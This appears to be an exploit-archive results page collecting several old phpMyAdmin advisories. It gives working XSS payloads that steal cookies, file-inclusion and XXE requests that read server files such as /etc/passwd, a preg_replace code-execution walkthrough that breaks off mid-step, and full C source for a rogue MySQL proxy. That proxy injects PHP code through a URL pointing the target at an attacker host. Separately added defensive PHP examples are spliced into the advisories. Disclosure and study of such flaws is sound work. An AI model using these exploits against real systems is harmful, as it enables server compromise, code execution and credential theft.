phpmyadmin
Search result for 'phpmyadmin'
benjamin moss/phpmyadmin.txt ( na)
vendor site: http://phpmyadmin.net/
product: PhpMyAdmin, all versions
bug: xss permanent & full path disclosure
global risk: high
xss post:
1) create a table, with whatever name; when it's done, go to "operation" (/db_operations.php) and add a comment on your table with:
</textarea>'"><script>alert(document.cookie)</script>
(the "alert" is only to show the xss is working ...)
this is a serious security issue, because it's a permanent xss: when you get into phpmyadmin you will get your cookie stolen directly, without looking at the attacker_table.
2) /phpmyadmin/db_create.php
variables: token=your_token&reload=1&db=[double xss (2 followed xss)]
3) /phpmyadmin/db_operations.php
variables: db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss]
4) /phpmyadmin/querywindow.php
token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss]
querydisplay_tab xss get:
http://site.com/phpmyadmin/sql.php?db=information_schema&token=your_token&goto=db_details_structure.php&table=CHARACTER_SETS&pos=</textarea>'"><script>alert(document.cookie)</script>
Note: if there's a "token=" on this string, it's because you need it, so replace this one with yours.
full path disclosure:
/scripts/check_lang.php
/themes/darkblue_orange/layout.inc.php
/index.php?lang[]=
/index.php?target[]=
/index.php?db[]=
/index.php?goto[]=
/left.php?server[]=
/index.php?table[]=
/server_databases.php?token=your_token&sort_by="
/index.php?db=information_schema&token=your_token&tbl_group[]=
/db_printview.php?db="
/sql.php?back[]=
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
PhpMyAdmin suffers from multiple cross site scripting vulnerabilities.
AlFa/phpmyadmin-xss.txt ( na)
---------------------------------------------------------------------------------
| ____ ____.__ __ |
| \ \ / /|__|_______/ |_ __ _______ ___ ___ |
| \ Y / | \_ __ \ __\ | \__ \ \ \/ / |
| \ / | || | \/| | | | // __ \_> < |
| \___/ |__||__| |__| |____/(____ /__/\_ \ |
| \/ \/ |
| Security without illusions |
| www.virtuax.be |
| |
---------------------------------------------------------------------------------
Application: Phpmyadmin
Vulnerable Versions: <= v2.8.1
Vulnerability: XSS
Vendor: http://www.phpmyadmin.net
Vendor Status: notified
Found: 11-01-2007
Public Release Date: 12-01-2007
Last modified: 12-01-2007
Author: AlFa
reference: http://www.virtuax.be/advisories/Advisory1-12012007.txt
=================================================================================
Shouts to Ciri, ShadoW, RedFern, Dreamer and the rest of the Virtuax Community =)
=================================================================================
I. Background
-------------
"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL
over the Web. Currently it can create and drop databases, create/drop/alter tables,
delete/edit/add fields, execute any SQL statement, manage keys on fields, manage
privileges, export data into various formats and is available in 50 languages."
by phpmyadmin.net
This issue was fixed in phpmyadmin v2.8.2
[quote=changelog]
2006-06-30 Marc Delisle <lem9@users.sourceforge.net>
* libraries/common.lib.php: escape also single quotes
### 2.8.2 released from QA_2_8
2006-06-28 Marc Delisle <lem9@users.sourceforge.net>
* libraries/common.lib.php: escape allowed parameters from non-token
requests
[/quote]
II. Vulnerability
-----------------
Originally phpMyAdmin < 2.6.2-rc1 contained an XSS vulnerability caused by
missing validation of input supplied to the "convcharset" variable (reference:
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-3). This problem was
solved by sanitizing $convcharset by pulling it through the PMA_sanitize() function.
However, that function only checks for > and < and neglects quotes in all versions
prior to 2.8.1. Here is some code:
[code=./libraries/common.lib.php]
// XSS
if (isset($convcharset)) {
$convcharset = PMA_sanitize($convcharset);
}
[/code]
[code=./libraries/sanitizing.lib.php]
function PMA_sanitize($message)
{
$replace_pairs = array(
'<' => '&lt;',
'>' => '&gt;',
'[i]' => '<em>', // deprecated by em
'[/i]' => '</em>', // deprecated by em
'[em]' => '<em>',
'[/em]' => '</em>',
'[b]' => '<strong>', // deprecated by strong
'[/b]' => '</strong>', // deprecated by strong
'[strong]' => '<strong>',
'[/strong]' => '</strong>',
'[tt]' => '<code>', // deprecated by CODE or KBD
'[/tt]' => '</code>', // deprecated by CODE or KBD
'[code]' => '<code>',
'[/code]' => '</code>',
'[kbd]' => '<kbd>',
'[/kbd]' => '</kbd>',
'[br]' => '<br />',
'[/a]' => '</a>',
);
return preg_replace('/\[a@([^"@]*)@([^]"]*)\]/', '<a href="\1" target="\2">', strtr($message, $replace_pairs));
}
[/code]
Now, because we can't use > or <, we can't escape from the input field,
so we have to use attributes to get this trick working. We can use the
style attribute to insert some css code and call javascript,
just like we can do in a regular cascading style sheet. eg:
STYLE="background-image: url(javascript:alert('XSS'))"
IIa. Affected Browsers
----------------------
All versions of Firefox seem to be unvulnerable to this attack (1.5 and 2.0 tested).
Opera also seems to be safe (v8.53 and v9.10 tested)
IE 6.x is not safe but IE 7.x is. Not yet tested: IE 5.x (but IE 5.2 for Mac seems to be unvulnerable).
III. PoC
--------
https://phpmyadmin.example.com/?convcharset=%22%20STYLE=%22background-image:%20url(javascript:alert('XSS'))%22%20r=%22
IV. Solution
------------
A. Quickfix
Replace this code (./main.php):
<input type="hidden" name="convcharset" value="<?php echo $convcharset; ?>" />
with this code:
<input type="hidden" name="convcharset" value="<?php echo addslashes($convcharset); ?>" />
B. upgrade to the new(er/est) version of phpmyadmin which you can find here:
http://www.phpmyadmin.net/home_page/downloads.php
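The example below is added here and is not code from the advisory or from phpMyAdmin. It reproduces the hidden field from main.php with two escapers: one that, like the PMA_sanitize() shown above, encodes only the angle brackets, and one that escapes for a double-quoted attribute with htmlspecialchars() and ENT_QUOTES, which encodes the quotes as well. The function names and the payload (a harmless attribute injection in the shape of the convcharset PoC) are constructed for this example. One property worth knowing when choosing a fix: addslashes() produces PHP/SQL-style backslash escapes, and a backslash before a quote has no escaping meaning to a browser inside an attribute value.

```php
<?php
// Added example (not part of the advisory): why encoding only < and > leaves
// an HTML attribute open, and what context-correct escaping produces instead.

/* Encode only the two angle brackets, as the advisory describes
 * PMA_sanitize() doing in phpMyAdmin <= 2.8.1. */
function escape_angle_brackets_only(string $s): string
{
    return strtr($s, ['<' => '&lt;', '>' => '&gt;']);
}

/* Escape for a double-quoted HTML attribute: both quote kinds are encoded. */
function escape_for_attribute(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/* Render the hidden field the way main.php did, with a chosen escaper. */
function render_hidden_field(string $value, callable $escaper): string
{
    return '<input type="hidden" name="convcharset" value="'
        . $escaper($value) . '" />';
}

/* The tag template itself contains exactly six double quotes (type, name,
 * value). Any further unencoded quote can only have come from the input,
 * which means the value attribute was terminated early. */
function attribute_breakout(string $html): bool
{
    return substr_count($html, '"') > 6;
}

// Constructed input: closes value="...", adds a style attribute, reopens a
// dummy attribute so the tag stays well-formed. Same shape as the PoC.
$payload = '" STYLE="color: red" r="';

$weak = render_hidden_field($payload, 'escape_angle_brackets_only');
$safe = render_hidden_field($payload, 'escape_for_attribute');

echo "angle brackets only:  ", $weak, "\n";
echo "  injected attribute: ", var_export(attribute_breakout($weak), true), "\n";
echo "htmlspecialchars:     ", $safe, "\n";
echo "  injected attribute: ", var_export(attribute_breakout($safe), true), "\n";
```

Run it with `php example.php`; the first rendering shows the STYLE attribute sitting inside the input tag, the second shows every quote from the input turned into `&quot;` so the whole payload stays a value.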
V. Timeline
-----------
11-01-2007: vulnerability found + contact with vendor
12-01-2007: public disclosure + vendor removed old (vulnerable) versions from download section
Copyright 2007 by Alfa from Virtuax.be All rights reserved.
PhpMyAdmin versions 2.8.1 and below suffer from a cross site scripting vulnerability.
Nasir Simbolon/phpMyAdmin257.txt ( na)
Software : phpMyAdmin
Version : 2.5.7
Vulnerability : php codes injection
Problem-Type : remote user
phpMyAdmin is web-based mysql administration written in PHP.
There is a vulnerability in phpMyAdmin version 2.5.7.
This vulnerability would allow a remote user to inject php code to be executed by the eval() function (in file left.php).
However, this vulnerability only has effect if the variable $cfg['LeftFrameLight'] is set to FALSE (in file config.inc.php).
1. Bugs
The bugs are that phpMyAdmin does not prevent any user from:
1.a. Ability to grow array variables by way of GET params
PhpMyAdmin has multiple server configurations stored in array variables ($cfg['Servers'][$i]). They are coded in file config.inc.php.
They are usually set at installation time by the owner.
Each configuration contains mysql server information to be used by phpMyAdmin, such as host, port, user, password, authentication type, database name etc. of the mysql server.
Up to three server configurations are provided by default.
However, an uninitialized $cfg['Servers'][$i] allows a remote user to add a server configuration to the list of server configurations by growing the $cfg['Servers'][$i] array through GET parameters.
A remote user could add a server configuration like this:
http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers][4][host]=202.81.x.x&cfg[Servers][4][port]=8888&cfg[Servers][4][user]=alice ..
and so forth.
The running script will use the fourth server configuration which the remote user supplies.
1.b. Escape 'magic' quote (') oops
If the variable $cfg['LeftFrameLight'] is set to FALSE, this part of the code is executed:
$eval_string = '$tablestack[\'' . implode('\'][\'', $_table) . '\'][\'pma_name\'][] = \'' . str_replace('\'', '\\\'', $table) . '\';';
eval($eval_string);
$eval_string will be php code that is executed by the function eval().
If we have one table named 'mytable', $eval_string will have the string value
$tablestack['']['pma_name'][] = 'mytable';
phpMyAdmin improperly handles escaping of the single quote.
So, with a crafted table name whose name contains meta-chars like this
\';exec(\"touch /tmp/touchable\");/*
$eval_string will have the value
$tablestack['']['pma_name'][] = '\\';exec("touch /tmp/touchable");/*';
In the php language, it will interpret the string as three php statements. The second statement will be our exploit code. The last statement, without the trailing comment, would just give a warning message in php.
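The following is an added example, not code from the advisory or from phpMyAdmin. It shows the defender's fix for the construct above: the nested $tablestack entry is built by walking the array by reference, so the table name is stored as data and eval() is never involved. A second function returns (and does not execute) the statement string the vulnerable code would have produced, so the escaping mistake is visible: str_replace() turns the attacker's `\'` into `\\'`, which in a single-quoted PHP string is one literal backslash followed by the quote that ends the string. The function names and the sample table name are constructed for this example.

```php
<?php
// Added example (not part of the advisory): store table names in the nested
// $tablestack array without building PHP source from them.

/* $path holds the nesting keys (the parts that were imploded into the eval
 * string); $table is the raw table name exactly as the server returned it. */
function add_table(array &$tablestack, array $path, string $table): void
{
    $node = &$tablestack;
    foreach ($path as $key) {
        if (!isset($node[$key]) || !is_array($node[$key])) {
            $node[$key] = [];
        }
        $node = &$node[$key];
    }
    $node['pma_name'][] = $table;   // plain assignment: any bytes are just data
}

/* For comparison only: the statement the vulnerable code would have handed
 * to eval(). This function returns the string; nothing here evaluates it. */
function eval_string_for(array $path, string $table): string
{
    return '$tablestack[\'' . implode('\'][\'', $path) . '\'][\'pma_name\'][] = \''
        . str_replace('\'', '\\\'', $table) . '\';';
}

// Constructed hostile name in the pattern the advisory describes:
// backslash, quote, statement separator, then a comment opener.
$hostile = "\\';phpinfo();/*";

$stack = [];
add_table($stack, [''], 'mytable');
add_table($stack, [''], $hostile);

// The hostile name is the second entry, byte for byte, and no code ran.
echo "stored verbatim: ", var_export($stack['']['pma_name'][1] === $hostile, true), "\n";

// What the old code would have evaluated: the quote after the doubled
// backslash closes the string literal early.
echo "old eval string: ", eval_string_for([''], $hostile), "\n";
```

The reference-walking builder is the general form of the fix: it works for any nesting depth that the imploded `$_table` parts produced, and it needs no escaping rules at all because the name never passes through the PHP parser.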
2. Exploit
Since mysql does not allow a table name to contain meta-chars, we have to provide a wrapper for the mysql server. The wrapper acts like a proxy, except that it sends a fake table name, when the client requests a "SHOW TABLES" query, by replacing the real table name with a string containing the exploit code.
http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers][4][host]=attacker.host.com&cfg[Servers][4][port]=8889&cfg[Servers][4][auth_type]=config&cfg[Servers][4][user]=user&cfg[Servers][4][password]=pass&cfg[Servers][4][connect_type]=tcp&&cfg[Servers][4][only_db]=databasename
On attacker.host.com the mysql wrapper will listen on port 8889 waiting for a connection.
3. Proof of Concept
The exploit code, a mysql wrapper written in C, can be found in the attachment or from
http://eagle.kecapi.com/sec/codes/phpmy-explt.c
4. Purpose
This full disclosure is intended for educational purposes.
Regards,
Nasir Simbolon
http://eagle.kecapi.com
--
timor Domini
-------------------------------------------------------
phpmy-explt.c
/*
 * phpmy-explt.c
 * written by Nasir Simbolon <nasir@kecapi.com>
 * http://eagle.kecapi.com
 * Jakarta, Indonesia
 *
 * June, 10 2004
 *
 * A phpMyAdmin-2.5.7 exploit program.
 * This is a kind of mysql server wrapper that acts like a proxy, except that
 * it sends a fake table name when the client queries "SHOW TABLES", by
 * replacing the real table name with a string containing the exploit code.
 *
 * Compile : gcc phpmy-explt.c -o phpmy-explt
 *
 * run with
 * ./phpmy-explt
 *
 * and go to your target and put
 *
 * http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers][4][host]=attacker.host.com&cfg[Servers][4][port]=8889&cfg[Servers][4][auth_type]=config&cfg[Servers][4][user]=user&cfg[Servers][4][password]=pass&cfg[Servers][4][connect_type]=tcp&&cfg[Servers][4][only_db]=databasename
 *
 * fill host, port, user, pass and databasename correctly
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define BIND_PORT 8889
#define MYSQL_PORT 3306
#define HOSTNAME "localhost"
#define DATABASE "phpmy"
#define BUFFER_LEN 1024

/* This is the php code we want to inject into phpMyAdmin.
   Do NOT use a single quote (') in the string, use a double quote (") instead.
*/
char *phpcodes = "exec(\"touch /tmp/your-phpmyadmin-is-vulnerable\");";

/* This is example data I captured when the mysql server replied to the
   client's "SHOW TABLES" query.
   It shows database name 'phpmy' and contains one tablename 'mytable'.
   Our aim is to manipulate the data received from the mysql server
   by replacing 'mytable' with our exploit code.
   0x1 ,0x0 ,0x0 ,0x1 ,0x1 ,0x1b,0x0 ,0x0 ,0x2 ,0x0 ,
   0xf ,'T' ,'a' ,'b' ,'l' ,'e' ,'s' ,'_' ,'i' ,'n' ,
   '_' ,'p' ,'h' ,'p' ,'m' ,'y' ,0x3 ,0x40,0x0 ,0x0 ,
   0x1 ,-2 ,0x3 ,0x1 ,0x0 ,0x1f,0x1 ,0x0 ,0x0 ,0x3 ,
   -2 ,8 ,0x0 ,0x0 ,0x4 ,7 ,'m' ,'y' ,'t' ,'a' ,
   'b' ,'l' ,'e' ,0x1 ,0 ,0 ,0x5 ,-2
*/
int build_exploite_code(char* dbname, char* phpcodes, char** expcode)
{
    char my1[21] = {0x1 ,0x0 ,0x0 ,0x1 ,0x1 ,0x1b,0x0 ,0x0 ,0x2 ,0x0 ,
                    0xf ,'T' ,'a' ,'b' ,'l' ,'e' ,'s' ,'_' ,'i' ,'n' ,
                    '_'};
    /* part of dbname ('p' ,'h' ,'p' ,'m' ,'y') */
    char my2[15] = {0x3 ,0x40,0x0 ,0x0 ,0x1 ,-2 ,0x3 ,0x1 ,0x0 ,0x1f,
                    0x1 ,0x0 ,0x0 ,0x3 ,-2};
    /* part of int phpcodes string length +1 (8) */
    char my3[3] = {0x0 ,0x0 ,0x4};
    /* part of int phpcodes string length (7) */
    /* part of tablename ('m' ,'y' ,'t' ,'a' ,'b' ,'l' ,'e' ) */
    char my4[5] = {0x1 ,0 ,0 ,0x5 ,-2};
    int len, i;

    len = 21 + strlen(dbname) + 15 + 1 + 3 + 1 + strlen(phpcodes) + 5 + 5;
    *expcode = (char*) malloc(sizeof(char) * len);
    i = 0;
    bcopy(&my1[0], *expcode + i, 21);
    i += 21;
    bcopy(dbname, *expcode + i, strlen(dbname));
    i += strlen(dbname);
    bcopy(&my2[0], *expcode + i, 15);
    i += 15;
    (*expcode)[i] = 5 + strlen(phpcodes) + 1;
    i++;
    bcopy(&my3[0], *expcode + i, 3);
    i += 3;
    (*expcode)[i++] = 5 + strlen(phpcodes);
    /* this is our exploit code */
    (*expcode)[i++] = '\\';
    (*expcode)[i++] = '\'';
    (*expcode)[i++] = ';';
    bcopy(phpcodes, *expcode + i, strlen(phpcodes));
    i += strlen(phpcodes);
    (*expcode)[i++] = '/';
    (*expcode)[i++] = '*';
    bcopy(&my4[0], *expcode + i, 5);
    return len;
}

/* connect to mysql server */
int connect_mysql()
{
    int s2;
    struct sockaddr_in ina;
    struct hostent *h;

    h = gethostbyname(HOSTNAME);
    /* set internet address */
    memset(&ina, 0, sizeof(ina));
    bcopy(h->h_addr, (void *)&ina.sin_addr, h->h_length);
    ina.sin_family = AF_INET;
    ina.sin_port = htons(MYSQL_PORT);
    //ina.sin_zero[0]='\0';
    if ((s2 = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        perror("Socket: ");
    if (connect(s2, (struct sockaddr *)&ina, sizeof(ina)) < 0)
        perror("connect()");
    return s2;
}

/* listener */
int listener()
{
    int s1;
    int opt;
    struct sockaddr_in ina;

    /* set internet address */
    memset(&ina, 0, sizeof(ina));
    ina.sin_family = AF_INET;
    ina.sin_port = htons(BIND_PORT);
    ina.sin_addr.s_addr = INADDR_ANY;
    if ((s1 = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        perror("Socket: ");
    opt = 1;
    setsockopt(s1, SOL_SOCKET, SO_REUSEADDR, (char *)&opt, sizeof(opt));
    if (bind(s1, (struct sockaddr *)&ina, sizeof(ina)) == -1)
        perror("Bind: ");
    if (listen(s1, 10) == -1)
        perror("Listen");
    return s1;
}

int main(int argc, char* argv[])
{
    struct sockaddr_in ina1;
    socklen_t ina1_l = sizeof(ina1);
    int s_daemon, s_mysql;
    ssize_t byte_read;
    char *buf;
    int sc, event, n_select;
    fd_set rfds;
    struct timeval tv;
    int exptlen, i;
    char *expt;
    char *dbname = DATABASE;

    buf = (char*) malloc(sizeof(char) * (BUFFER_LEN));
    tv.tv_sec = 15;
    tv.tv_usec = 0;
    /* we listen to port */
    s_daemon = listener();
    exptlen = build_exploite_code(dbname, phpcodes, &expt);
    for (;;)
    {
        fprintf(stderr, "waiting for connection\n");
        if (-1 == (sc = accept(s_daemon, (struct sockaddr *) &ina1, &ina1_l)))
            perror("accept()");
        /* if we get here, we have a new connection */
        fprintf(stderr, "got client connection\n");
mysql:
        /* connect to mysql */
        s_mysql = connect_mysql();
        for (;;)
        {
            FD_ZERO(&rfds);
            FD_SET(sc, &rfds);
            FD_SET(s_mysql, &rfds);
            n_select = (sc > s_mysql) ? sc : s_mysql;
            event = select(n_select + 1, &rfds, NULL, NULL, NULL);
            if (-1 == event)
                perror("select()");
            else
            {
                if (FD_ISSET(s_mysql, &rfds))
                {
                    byte_read = read(s_mysql, buf, BUFFER_LEN);
                    /* check for closing client connection */
                    if (byte_read == 0)
                    {
                        shutdown(s_mysql, SHUT_RDWR);
                        close(s_mysql);
                        goto mysql;
                    }
                    /* check data received from mysql server.
                     * if buf[11] contains 'T', the data received from the mysql
                     * server is the table list.
                     *
                     * NOW we replace the table with our exploit code and send
                     * it to the client
                     */
                    if ('T' == buf[11])
                    {
                        for (i = 0; i < exptlen; i++)
                            buf[i] = expt[i];
                        byte_read = exptlen;
                    }
                    if (write(sc, buf, byte_read) < 0)
                        break;
                }
                if (FD_ISSET(sc, &rfds))
                {
                    byte_read = read(sc, buf, BUFFER_LEN);
                    /* check for closing client connection */
                    if (byte_read == 0)
                    {
                        close(sc);
                        break;
                    }
                    if (write(s_mysql, buf, byte_read) < 0)
                        break;
                }
#if defined(DEBUG)
                fprintf(stderr, "data:\n");
                for (i = 0; i < byte_read; i++)
                    fprintf(stderr, " %c(%x) ", buf[i], buf[i]);
#endif
            }
        }
    }
    free(buf);
    free(expt);
    return 0;
}
phpMyAdmin version 2.5.7 is susceptible to allowing remote malicious users the ability to inject PHP code. Full exploit provided.
Maksymilian Arciemowicz/phpMyAdmin261.txt ( na)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpMyAdmin 2.6.1 Remote file inclusion and XSS cXIb8O3.4]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 24.2.2005
- --- 0.Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
- --- 1. Remote file inclusion ---
1.0
This bug exists in css/phpmyadmin.css.php. You can
include files. The error exists in
Code:
- ------
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' .
$theme . '/css/theme_right.css.php';
if (@file_exists($tmp_file)) {
include($tmp_file);
} // end of include theme_right.css.php
- ------
And now you can get files.
For example:
http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
etc.
1.1
Or next include is in libraries/database_interface.lib.php
Code:
- ---
18# require_once('./libraries/dbi/' . $cfg['Server']['extension'] . '.dbi.lib.php');
- ---
For example:
http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3
Error message :
- ---------------
Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18
Fatal error: main() [function.require]: Failed opening
required './libraries/dbi/cXIb8O3.dbi.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18
- ---------------
Or, if you want, and if you see the php error and register_globals=on, you can make
xss with the php bug. For example:
http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E
- --- 2. XSS aka Cross Site Scripting ---
If register_globals=On:
2.0
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
2.1
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
2.2
http://[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
and more in this file.
2.3
http://[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_family=[XSS]
and more in this file.
- --- 3. How to fix ---
CVS or
https://sourceforge.net/tracker/download.php?group_id=23067&atid=377408&file_id=122735&aid=1149381 >> libraries/grab_globals.lib.php or wait for new version..
- --- 4. Greets ---
sp3x.
i need help.. :(
- --- 5.Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
http://securityreason.com/ Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)
iD8DBQFCHR89znmvyJCR4zQRAtj3AJ4wxM3WEn56GNohsG3f4U8Ku+/I8wCeMWQr
YklTAm82iDqNu3so1uYsmEk=
=ko9x
-----END PGP SIGNATURE-----
phpMyAdmin versions 2.6.1 and below suffer from remote file inclusion and cross site scripting flaws. Detailed exploitation given.
WooYun/phpMyAdmin Arbitrary File Read ( na)
Hi
80sec reported this bug on wooyun. PhpMyadmin uses the simplexml_load_string
function to read xml from user input; this may be exploited to read files
from the server or network.
In libraries/import/xml.php, some code like this:
/**
* Load the XML string
*
* The option LIBXML_COMPACT is specified because it can
* result in increased performance without the need to
* alter the code in any way. It's basically a freebee.
*/
$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);
unset($buffer);
/**
* The XML was malformed
*/
if ($xml === FALSE) {
so you just need to make an xml like this:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE wooyun [
<!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">
]>
<pma_xml_export version="1.0" xmlns:pma="
http://www.phpmyadmin.net/some_doc_url/">
<!--
- Structure schemas
-->
<pma:structure_schemas>
<pma:database name="test" collation="utf8_general_ci"
charset="utf8">
<pma:table name="ts_ad">
&hi80sec;
</pma:table>
</pma:database>
</pma:structure_schemas>
<!--
- Database: 'thinksns'
-->
<database name="thinksns">
<!-- Table ts_ad -->
</database>
</pma_xml_export>
then import this xml in PhpMyAdmin, and you will get the content you want.
From:http://www.wooyun.org/bugs/wooyun-2010-03185
:)
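The example below is added here and is not code from the WooYun report or from phpMyAdmin. It wraps simplexml_load_string() the way a hardened importer should: the import format never needs a DTD, so any DOCTYPE is refused before parsing (a DTD is the only place an entity can be declared), the external entity loader is switched off on PHP versions where it is on by default, LIBXML_NONET stops network fetches, and LIBXML_NOENT is deliberately not passed so entities are never substituted. The function name and both XML documents are constructed for this example; the second document carries an external entity of the same shape as the one in the report.

```php
<?php
// Added example (not part of the report): parse a phpMyAdmin-style import
// document while refusing entity declarations and external resources.

function load_import_xml(string $buffer): SimpleXMLElement
{
    // Reject any DTD outright: no entity can be declared without one.
    if (preg_match('/<!DOCTYPE/i', $buffer)) {
        throw new InvalidArgumentException('DOCTYPE declarations are not allowed in imports');
    }
    // On PHP < 8.0 (libxml < 2.9) external entity loading is on by default;
    // the call is deprecated and unnecessary from PHP 8.0 on.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);
    // LIBXML_NONET: no network access during parsing.
    // LIBXML_NOENT is intentionally absent: entities are never expanded.
    $xml = simplexml_load_string($buffer, 'SimpleXMLElement', LIBXML_COMPACT | LIBXML_NONET);
    if ($xml === false) {
        $msg = implode('; ', array_map(fn($e) => trim($e->message), libxml_get_errors()));
        libxml_clear_errors();
        throw new RuntimeException('Malformed XML: ' . $msg);
    }
    return $xml;
}

// Constructed documents: a plain export header, and one with an external entity.
$safe_doc = '<?xml version="1.0"?>'
          . '<pma_xml_export version="1.0"><database name="test"/></pma_xml_export>';
$xxe_doc  = '<?xml version="1.0"?>'
          . '<!DOCTYPE x [<!ENTITY leak SYSTEM "file:///etc/hostname">]>'
          . '<pma_xml_export version="1.0"><database name="&leak;"/></pma_xml_export>';

$ok = load_import_xml($safe_doc);
echo "accepted, database name: ", (string) $ok->database['name'], "\n";

try {
    load_import_xml($xxe_doc);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

The DOCTYPE check is the part that generalises: it also blocks internal-entity expansion tricks, which the libxml flags alone do not address, and it gives a clear error to log and alert on instead of a silently empty import.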
phpMyAdmin suffers from a remote arbitrary file reading vulnerability when using a simplexml_load_string function meant to read xml from user input.
waraxe/phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities ( php)
[waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
===============================================================================
Author: Janek Vind "waraxe"
Date: 25. April 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-103.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the World Wide Web. phpMyAdmin supports a wide
range of operations with MySQL.
http://www.phpmyadmin.net/home_page/index.php
###############################################################################
1. Remote code execution via preg_replace() in "libraries/mult_submits.inc.php"
###############################################################################
Reason:
1. insufficient sanitization of user data before using in preg_replace
Attack vectors:
1. user-supplied parameters "from_prefix" and "to_prefix"
Preconditions:
1. logged in as valid PMA user
2. PHP version < 5.4.7 (Newer versions: Warning: preg_replace(): Null byte in regex)
PMA security advisory: PMASA-2013-2
CVE id: CVE-2013-3238
Affected phpMyAdmin versions: 3.5.8 and 4.0.0-RC2
Result: PMA user is able to execute arbitrary PHP code on webserver
Let's take a look at the source code:
Php script "libraries/mult_submits.inc.php" line 426 (PMA version 3.5.8):
------------------------[ source code start ]----------------------------------
case 'replace_prefix_tbl':
$current = $selected[$i];
$newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
$a_query = 'ALTER TABLE ' . PMA_backquote($selected[$i]) . ' RENAME ' .
PMA_backquote($newtablename) ; // CHANGE PREFIX PATTERN
$run_parts = true;
break;
case 'copy_tbl_change_prefix':
$current = $selected[$i];
$newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
$a_query = 'CREATE TABLE ' . PMA_backquote($newtablename) . ' SELECT * FROM '
. PMA_backquote($selected[$i]) ; // COPY TABLE AND CHANGE PREFIX PATTERN
$run_parts = true;
break;
------------------------[ source code end ]------------------------------------
We can see that the PHP variables "$from_prefix" and "$to_prefix" are used in the
preg_replace function without any sanitization. It appears that those variables
come from a user-submitted POST request as parameters "from_prefix" and
"to_prefix". It is possible to inject the e-modifier with a terminating null byte via the
first parameter and php code via the second parameter. In case of successful
exploitation, the injected PHP code will be executed on the PMA webserver.
Tests:
1. Log in to PMA and select database:
http://localhost/PMA/index.php?db=test&token=25a6ce9e288070bd28c3f9aebffad1b8
2. select one table from database by using checkbox and then select
"Replace table prefix" from select control "With selected:".
3. We can see form named "Replace table prefix:" with two input fields.
Type "/e%00" to the "From" field and "phpinfo()" to the "To" field.
4. Activate Tamper Data Firefox add-on:
https://addons.mozilla.org/en-us/firefox/addon/tamper-data/
5. Click "Submit", Tamper Data pops up, choose "Tamper".
6. Now we can modify POST request. Look for parameter "from_prefix".
